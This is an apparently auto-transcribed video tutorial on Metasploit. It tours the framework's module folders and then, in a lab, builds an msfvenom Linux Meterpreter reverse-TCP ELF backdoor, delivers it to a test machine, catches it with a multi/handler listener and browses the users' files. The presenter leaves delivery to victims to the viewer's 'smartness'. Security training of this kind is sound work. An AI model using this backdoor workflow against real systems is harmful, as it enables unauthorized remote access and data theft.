Hello, friends, and welcome to the next episode of our pen testing tool series from CyberUnnat Academy. Today's focus Metasploit. Before we deep dive, make sure to subscribe to our YouTube channel and follow us on our Instagram for more tips, tricks, and updates. Stay ethical, stay informed, stay ahead. Let's start Metasploit. So, what is Metasploit? Metasploit is a open source pen testing tool used by ethical hackers, red teamers, and security professionals. It helps to identify, exploit, validate vulnerabilities in a system, just like an attacker would. But in legal and control environment, okay, it's a core weapon in any ethical hacker's pocket or in his portfolio, we can say. So now let's talk about some key features of Metasploit exploit modules. Metasploit offers hundreds of ready-to-use exploit for known vulnerabilities. You don't need to write anything from scratch. Just load the module, configure it, and launch a simulation. Payload generation. With Metasploit, you can create a payload that give you remote access to the target system, like a reverse shell or a focused metafilter, which, which give you full control over the machine. Then post exploitation tools. Uh, Once we inside the machine, then Metasploit let you go further, like gathering the system information, extracting credential, or escalating privilege, like getting a terminal or getting a CLI command from the victim or the test machine. It's not just about breaking; it's all about what you can do after that. Then automation and scripting. It also like when you are running repeated tasks, test, automating complex scenarios is automated. Metasploit supports scripting and automation with the resource files, making your workflow efficient and repeatable. In short, Metasploit isn't just a tool, it's a complete platform for ethical hacking and red teaming. If you are learning cybersecurity, start exploring Metasploit. Uh, I'll cover hands-on some basic demos. Also, we'll try to exploit some live vulnerabilities in the upcoming videos. So don't forget to like, subscribe, and hit the bell icon for the updates. So, now let's start Metasploit. For now, you need to open a Kali. Just log into your Kali machine. Open a terminal. Make sure that you log in with root or a super user like this. So, if you have not updated your machine, so please add this command apt get update and an apt get upgrade and let it run. So today my machine is already updated. So we'll try. Means obviously we'll open a Metasploit. So command is msf console. Okay. Type msf console and hit enter. This will be a long video. So okay, it's starting. Sometimes it takes time. It's due to my machine load and availability of the other resources. Okay, like this. Just me. Metasploit console is started. Okay, okay. Now it's started fully. MSF6 as you will see and Metasploit is started. So how to exit? Simply type exit and hit enter. So it will exit. So before going to the Metasploit, we'll try to explore some directories which are important. So you need to go to USR, share Metasploit Framework and hit enter. So you will see lots of directories are there: app config, data, db doc, documentation if you want to go, etc. We'll see today modules, cd modules. In this module, you will see many. So first we'll see exploits. Exploits. So into this, uh, this is like where the actual exploit goes live. It contain and platform specific attack modules like Windows, Linux. See Windows, Linux, OpenBSD, NetWare, Solaris, FreeBSD, Android, etc. Is specific to each module. If you like check for go inside the Windows and check like lots of uh, lots of modules are there. Attack modules are available: FTP, TFTP, Telnet, HTTP, etc. Likewise, we'll see one by one the use of it. Come back to modules. Okay. Now we'll see payload, adapter, single, stranger, and stage. Payload. These are like in the payload. These are like actual action you want to execute after the exploiting target. It includes things like reverse shell, bind shell, and even the most powerful meterpreter session that give you control of the systems. So we'll see use of this payloads like uh, during the session. So see, this is like taking out of this is like HTTP, PowerShell, etc. These are the payloads into this. If you can see if you want to see okay, payloads, we need to simply put the options over there in the Metasploit to use these payloads. Okay, we'll come back to our modules folder, tasks and modules. Post, we'll see then post. Okay, into the post. These are the post exploitation modules. Just like for Windows, taking remote, etc. We'll see in Windows. Okay, gather information, recon like computer browser. See, see. Okay, so likewise, post exploitation modules. Once you gain access, this help you to escalate privilege, gather info, dump credential, and move literally within the network. So basically, these are codes all. We need to use it. Right now, you can just see, but I wanted to give you exploration of the different auxiliary. Then go to auxiliary folder. The auxiliary folder. This is like you think of you having a Swiss Army knife. It includes scanners, fuzzer, sniffer, and tool services like FTP, SSH, HTTP, and many more. Great for information gathering and network reconnaissance. These directories make up the heart of the Metasploit, like all these are all the program modules, etc. Whatever options available are available in these directories. Okay, just come back to main directory. Okay, this is the heart of a Metasploit. So we'll explore how we can use and modify these custom further. Like stay stay tuned. Okay, let's start uh, MSF console Metasploit. Just, okay, that should be fine. Okay, still it's we need to wait it when launching. It's launch. Every time you will see a different graphic over here related to Metasploit or related to hacking. Okay, now it's launch. So first we'll see how to take a reverse connection of any machine using a backdoor. So basically for that we need to generate a payload for this. So I have a machine this CentOS. First we need to check IP. We need a IP. So uh, keep this in mind. Go to your attacker machine. We need to use command msf venom. Okay, this is the command for generating the payload. Hyphen p as our machine is CentOS. So type Linux x64 Metavritter re yeah reverse TCP. First we'll see like the help regarding this command msf venom. Okay, it's having the like lots of options are the hyphen p for payloads. Okay, format encoder encrypt etc etc. Okay, we need to type the command hyphen p linux x64 tab will not work here Metapreta reverse TCP lhost our machine IP test machine IP our IP means attacker IP over here LPORT port number you can do anything just let's 444 hyphen F for output ELF hyphen O and name SHELL hyphen ELF. Okay, so this will generate a payload. It's showing no permission denied, but it should be generated in the backend. We'll see shelf.elf. Okay, it is there. So let's clear it. So now Somehow we need to transfer this payload to the attacker machine. So this is like your smartness, how you're transferring. You can like right now we are just doing SCP. Mm, Open a different terminal. File is there. SCP. It, it's Sometimes it take time, sometimes it will not take time. Okay. So this file is I've reached. I just copied over here. Later it will be like your smartness, how you are transferring this file to the victim machine. So like use whatever method you can like do you, as per your smartness. I'll not tell right now. So this is kind of a virus file over here to the attacker machine. You can use maybe USB and transfer it to here. And now once we execute the file, we'll get a reverse connection to the Kali. So for that, we need to set up a listener. So for that, uh, in the MSF console, like use exploit multi handler. Okay, this is multi handler using configure payload. Multi handler is an set payload Linux. Our whatever we payload use in the previous x64 Metasploit reverse TCP connection. Okay, so this payload is set mm, set L host. Like this is our, it can be like any because we already configure uh, the our host over there, so it will contact to our machine. Set set L port. The port the same we configured over there that we need to do, and hit enter. We'll see options. Okay, L port, R port, and now we need to run L port. One or more options fails. Validate L port. Okay, this set L port. Okay, my bad. The point was there. Show options. Okay, now and run. So now it's going in the listening mode. So started reverse TCP handler. Okay. So now suppose the attacker side when uh, someone run our malware file, we need to set up permissions also for this. There's ls hyphen l shell dot elf. So basically RRR, there is no execute permission. So for that chmod. So see during this practical, that's why this importance of the basic commands that you should know. Then I'll recommend to first go and complete your uh, basic uh, Linux administration, Windows administration, and network administration, and then touch to ethical hacking courses. Okay, so now we can run. So it's like whatever we created a malware file that is running, and once it's running, we'll see over here. We'll get the like one connection open from the attacker, uh, and we boom, we get into the into that machine. So uh, you can see that machine basically over here. Uh, cd slash home. So Alice, Bob, Sam, you users like the same over here. You will see lots of users are there. Then cd Bob pwd present working directory is home. Let's go to Alice. Okay, we are into Alice user and we can see its data. So this is how we can like you use uh, we get the remote connection from the machines. Once you type help command over here, you will see a lot of options are available for you to run through the command cat cd checksum chmod etc. download, edit, get, lcat, the names over here also. So basically these are the core commands which you help you to extract whatever data from the remote machine. And like yeah, this is our Metasploit. So you can just exit from here and exit. So right now we just tried the reverse connection. Okay, here is also it's ended. We tried the reverse connection for the machine. So later on we'll also in the second part of this Metasploit framework, we'll try to exploit the actual vulnerability from the attacker machine. So till then, if you have any questions, comments, or do let me know in the comments, and please or you can reach out to me to my Instagram page at the rate CyberUnnat, or you can contact me over here to the channel. Till then, uh, let's have a uh, test test your abilities to just try to set up a reverse connection, try to set up the other commands using the Metasploit framework and Kali. Till then, happy hacking and have a good day, guys. We'll see in the next part 2 of this video for exploiting the actual vulnerability of the machines. Till then, bye. Take care.